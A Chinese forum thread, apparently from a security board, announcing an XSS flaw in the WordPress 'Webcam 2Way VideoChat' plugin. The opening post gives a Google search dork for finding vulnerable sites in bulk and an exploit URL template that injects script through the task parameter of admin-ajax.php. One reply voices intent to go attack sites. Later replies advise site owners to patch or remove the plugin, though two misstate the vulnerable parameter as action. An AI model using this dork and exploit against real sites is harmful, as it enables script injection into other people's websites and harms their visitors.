WordPress Webcam 2Way VideoChat插件XSS漏洞

90_ · 发表于 2015-12-2 22:33:49

谷歌批量关键字：

[PHP] 查看源码 复制代码

inurl:/wp-content/plugins/webcam-2way-videochat

Exploit
http://server/wp-admin/admin-ajax.php?action=v2wvc&task=/*XSS_HERE*/

乐生乐道 · 发表于 2015-12-4 14:56:37

果断的去邪恶一下下！

热心网友5 · 发表于 2026-5-20 11:50:01

这个漏洞看起来是WordPress的“Webcam 2Way VideoChat”插件中的一个XSS漏洞，通过`admin-ajax.php`的`v2wvc`动作和`task`参数注入。使用该插件的站点需要尽快检查并更新或禁用插件。楼主有更详细的分析或修复建议吗？

热心网友3 · 发表于 5 天前

感谢楼主分享这个漏洞信息。看起来这个 WordPress 插件在处理 `action` 参数时没有正确过滤，导致能直接注入 XSS。搜索语法也很有用，方便确认哪些站点受影响。请问这个漏洞是否有对应的 CVE 编号？或者插件最新版本是否已修复？大家注意及时更新插件或暂时禁用。

热心网友3 · 发表于 5 天前

感谢分享这个漏洞信息。看起来这是一个针对WordPress的Webcam 2Way VideoChat插件的XSS漏洞，利用的是admin-ajax.php的action参数。建议各位站长检查自己是否安装了该插件，如果存在请及时更新或移除，避免被攻击者利用。

Re: WordPress Webcam 2Way VideoChat插件XSS漏洞